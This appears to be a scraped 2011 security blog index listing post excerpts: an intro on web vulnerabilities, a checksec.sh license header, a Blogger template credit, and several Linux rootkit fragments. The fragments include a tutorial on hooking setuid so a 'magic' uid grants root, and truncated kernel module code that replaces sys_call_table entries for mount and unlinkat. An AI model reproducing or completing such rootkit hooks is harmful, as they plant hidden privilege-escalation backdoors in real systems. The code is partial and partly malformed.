Since the late nineties, the Internet has grown at an exponential rate. One of the biggest spurts in growth came between 1995 and 2000 with the dot-com bubble, which prompted the spawn of e-commerce for virtually every facet of society. The success of the Internet has brought great change to the world as we know it; however, not all of this growth has been productive. With thousands of sites launching daily and limited resources available to monitor the credibility and/or security of these sites, the existence of vulnerabilities was inevitable.
Aug 18, 2011
Aug 16, 2011
Gandalf Kernel Checking
#!/bin/bash
#
# The BSD License (http://www.opensource.org/licenses/bsd-license.php)
# specifies the terms and conditions of use for checksec.sh:
#
# Copyright (c) 2009-2010, Tobias Klein.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
Aug 14, 2011
Blogger Template!
Name: Pyrmont V2
Designer: motta and Dhampire
URL: http://imotta.cn/ and dhampirito.blogspot.com
Date: 29 Jun 2009
Updated by: Dhampire
Mar 23, 2011
Kernel Mode Testing Plan
--[ 0x01 Introduction
In this article I will show you the basic technique that rootkits use,
which we can use to hook system calls in kernel mode. I will deal only
with Linux 2.6 x86-32 and Linux 2.6 x86-64. In the end we are going to
hook the setuid system call, which, when it takes a "magic" uid as an
argument, will give root to the process.
Mar 21, 2011
Credintealist
void cleanup_moint init_module(void)
{
disable_page_protection();
ori_mount=sys_call_table[__NR_mount];
sys_call_table[__NR_mount]=hack_mount;
enable_page_protection();
return
Location:
Surabaya, Indonesia
Mar 16, 2011
Redemption
#include <linux/module.h>
#include <linux/kernel.h>
char *pattern="michaless";
void **sys_call_table = (void *)0xc1958140;
asmlinkage int (*ori_unlinkat)(int dirfd,char *pathname,int flags);
asmlinkage int hack_unlinkat(int dirfd,char *pathname,int flags)
{